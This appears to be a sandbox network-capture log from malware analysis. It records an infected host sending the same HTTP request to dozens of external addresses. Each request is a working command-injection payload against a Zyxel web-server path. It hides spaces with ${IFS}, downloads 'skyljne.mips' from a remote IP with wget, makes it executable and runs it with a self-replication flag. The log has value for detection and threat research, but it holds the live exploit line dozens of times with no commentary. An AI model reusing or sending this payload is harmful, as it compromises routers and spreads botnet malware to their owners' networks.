                                                Jan 12, 2024 18:16:14.232897997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2251192.168.2.233918676.59.209.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232944012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2252192.168.2.2351778136.142.128.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232989073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2253192.168.2.234577672.88.175.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233017921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2254192.168.2.2350732124.195.192.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233066082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2255192.168.2.23548785.30.34.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233109951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2256192.168.2.233764457.136.15.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233146906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2257192.168.2.2336426114.65.204.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233190060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2258192.168.2.235091647.7.127.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233212948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2259192.168.2.235966480.11.205.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233269930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2260192.168.2.2337558129.177.67.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233320951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2261192.168.2.233604279.67.121.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233355999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2262192.168.2.2344572200.76.242.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233391047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2263192.168.2.2352364218.228.2.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233443022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2264192.168.2.2357598192.250.183.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233486891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2265192.168.2.235559832.112.218.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233536005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2266192.168.2.234036692.253.21.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233577967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2267192.168.2.2353028181.46.25.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233597994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2268192.168.2.2342420178.22.27.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233647108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2269192.168.2.2340966102.247.208.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233709097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2270192.168.2.2341382216.186.46.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233735085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2271192.168.2.2354680162.226.86.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233774900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2272192.168.2.235571264.239.13.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233825922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2273192.168.2.233558817.166.192.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233870029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2274192.168.2.2359958205.36.217.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233910084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2275192.168.2.2343808161.29.98.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233932972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2276192.168.2.233923077.92.227.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.233992100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2277192.168.2.2357728162.69.3.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234013081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2278192.168.2.2357696192.191.34.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234055042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2279192.168.2.2351622113.172.50.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234098911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2280192.168.2.2333456104.89.26.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234134912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2281192.168.2.2341460216.176.205.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234174013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2282192.168.2.2352334108.106.36.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234225035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2283192.168.2.2346878201.142.95.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234276056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2284192.168.2.234560259.32.210.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234312057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2285192.168.2.233278427.191.153.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234342098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2286192.168.2.2355812168.19.176.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234396935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2287192.168.2.235733437.186.20.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234438896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2288192.168.2.2340154141.166.77.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234484911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2289192.168.2.234351086.184.122.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234529018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2290192.168.2.2339396175.76.215.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234577894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2291192.168.2.234558486.29.9.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234621048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2292192.168.2.2351252213.128.124.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234658957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2293192.168.2.2338754153.115.141.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234694958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2294192.168.2.2347150220.228.171.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234723091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2295192.168.2.2360616175.115.155.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234725952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2296192.168.2.2341272184.96.41.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234778881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2297192.168.2.2358250107.3.68.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234822989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2298192.168.2.233450292.123.89.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234858990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2299192.168.2.2358792201.237.197.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234885931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2300192.168.2.2333392143.142.149.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234915018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2301192.168.2.235721840.44.29.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.234958887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2302192.168.2.235937060.134.229.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235006094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2303192.168.2.233923454.143.12.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235044003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2304192.168.2.234627017.247.245.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235097885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2305192.168.2.2357264166.59.30.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235146999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2306192.168.2.2360076201.103.66.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235177040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2307192.168.2.2343496194.215.220.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235239983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2308192.168.2.234792048.247.63.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235265017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2309192.168.2.233492827.221.225.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235281944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2310192.168.2.2332822113.58.49.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235325098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2311192.168.2.2352096189.189.79.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235366106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2312192.168.2.233854017.196.98.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.235385895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2313192.168.2.2345824146.203.1.233443
                                                TimestampBytes transferredDirectionData
